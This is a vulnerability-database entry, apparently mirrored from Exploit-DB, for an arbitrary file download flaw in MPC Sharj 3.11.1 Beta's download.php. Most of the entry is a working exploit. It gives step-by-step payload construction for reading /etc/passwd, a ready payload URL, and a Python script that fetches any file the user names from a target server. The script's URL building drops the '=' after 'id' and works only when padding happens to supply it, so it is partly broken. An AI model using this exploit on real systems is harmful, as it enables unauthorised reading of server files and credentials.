MPC Sharj 3.11.1 - Arbitrary File Download

vendor:

MPC Sharj

by:

SajjadBnd

7.5

CVSS

HIGH

Arbitrary File Download

434

CWE

Product Name: MPC Sharj

Affected Version From: 3.11.1 Beta

Affected Version To: 3.11.1 Beta

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Ubuntu 19.10

2020

MPC Sharj 3.11.1 – Arbitrary File Download

MPC Sharj is a free open source script for creating sim card credit card's shop. The vulnerability exists in the download.php file, where the parameter 'id' is vulnerable to an arbitrary file download attack. An attacker can craft a malicious payload by converting the file to be read into base64, then reversing the base64 string, and finally passing it as a parameter to the download.php file.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in file operations.

Source

Exploit-DB raw data:

# Exploit title : MPC Sharj 3.11.1 - Arbitrary File Download
# Exploit Author : SajjadBnd
# Date : 2020-05-02
# Software Link : http://dl.nuller.ir/mpc-sharj-vr_3.11.1_beta[www.nuller.ir].zip
# Tested on : Ubuntu 19.10
# Version : 3.11.1 Beta
############################
#
# [ DESCRIPTION ]
#
# MPC Sharj is a free open source script for creating sim card credit card's shop.
#
# [POC]
#
# Vulnerable file: download.php
# parameter : GET/ "id"
# 69: readfile readfile($file);
# 55: $file = urldecode(base64_decode(strrev($file)));
# 53: $file = trim(strip_tags($_GET['id']));
#
# payload : [
# Steps:
#
# 1. convert your payload (/etc/passwd) to base64 (L2V0Yy9wYXNzd2Q=)
# 2. convert base64 result (L2V0Yy9wYXNzd2Q=) to strrev (=Q2dzNXYw9yY0V2L)
# 3. your payload is ready ;D
# http://localhost/download.php?id==Q2dzNXYw9yY0V2L
#
#]
#

import requests
import os
from base64 import b64encode

def clear():
linux = 'clear'
windows = 'cls'
os.system([linux, windows][os.name == 'nt'])

def banner():
print '''
##############################################################
##############################################################
#### # ######### # #### ######### #####
#### ### ###### ## #### ###### #### ############# #####
#### #### #### ### #### ###### #### ###################
#### ##### ## #### #### ####### ###################
#### ###### ##### #### ############ ###################
#### ############### #### ############ ############# #####
#### ############### #### ##666######### ######
##############################################################
##############################################################
###### MPC Sharj 3.11.1 Beta - Arbitrary File Download #####
##############################################################
'''

def exploit():
target = raw_input('[+] Target(http://example.com) => ')
read_file = raw_input('[+] File to Read => ')
read_file = b64encode(read_file)
target = target+"/download.php?id"+read_file[::-1]
r = requests.get(target,timeout=500)
print "\n"+r.text

if __name__ == '__main__':
clear()
banner()
exploit()